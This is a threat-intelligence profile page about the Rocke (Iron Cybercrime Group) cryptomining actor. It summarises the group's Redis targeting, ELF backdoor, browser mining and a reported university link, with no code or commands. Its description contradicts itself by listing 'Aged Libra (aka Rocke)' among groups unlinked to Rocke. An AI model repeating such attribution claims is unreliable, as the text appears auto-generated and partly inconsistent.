Rocke

Threat Actor updated 4 months ago (2024-06-11T09:17:35.599Z)
Download STIX
Preview STIX
Rocke, also known as the Iron Cybercrime Group, is a significant threat actor in the cybersecurity landscape. Identified by Talos in 2018, Rocke has been linked to various malicious activities, including the deployment of an ELF backdoor for financial gain. The group's primary motivation appears to be financial, utilizing botnets and ransomware to achieve their objectives. Their operations have evolved over time, with increasing sophistication evident in their malware and attack vectors. One notable payload was UPX packed and exhibited similar behavior to the file "dDNLQrsBUE.url" dropped by "TermsHost.exe." Despite targeting vulnerable Redis instances and performing worm-like operations, Rocke does not share known links with other threat actor groups that target Redis and deploy worms, such as Automated Libra (aka PurpleUrchin), Adept Libra (aka TeamTNT), Thief Libra (aka WatchDog), Money Libra (aka Kinsing), Aged Libra (aka Rocke), or Returned Libra (aka 8220). This distinct operation style further underlines Rocke's unique threat profile within the cybersecurity landscape. Furthermore, Rocke has demonstrated interest in browser-based JavaScript mining through the tool CryptoNote and browser-based exploitation via the Browser Exploitation Framework. These varied campaigns highlight the diverse infection vectors, malware, and infrastructure that this group is willing to employ to reach its goals. Evidence from GitHub suggests an affiliation between Rocke and Jiangxi Normal University, although the nature of this relationship remains unclear. The continuous evolution and diversification of Rocke's tactics underscore the importance of ongoing monitoring and research into this threat actor.
Description last updated: 2024-06-11T09:16:48.193Z
What's your take? (Question 1 of 2)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.
Alias DescriptionVotes
Iron Cybercrime Group is a possible alias for Rocke. The Iron Cybercrime Group, also known as Rocke, is a notable threat actor in the cybersecurity landscape. This group is responsible for executing actions with malicious intent, typically driven by financial motivations. Threat actors like this can range from individuals to private companies or even
2
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Cybercrime
Backdoor
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Source Document References
Information about the Rocke Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more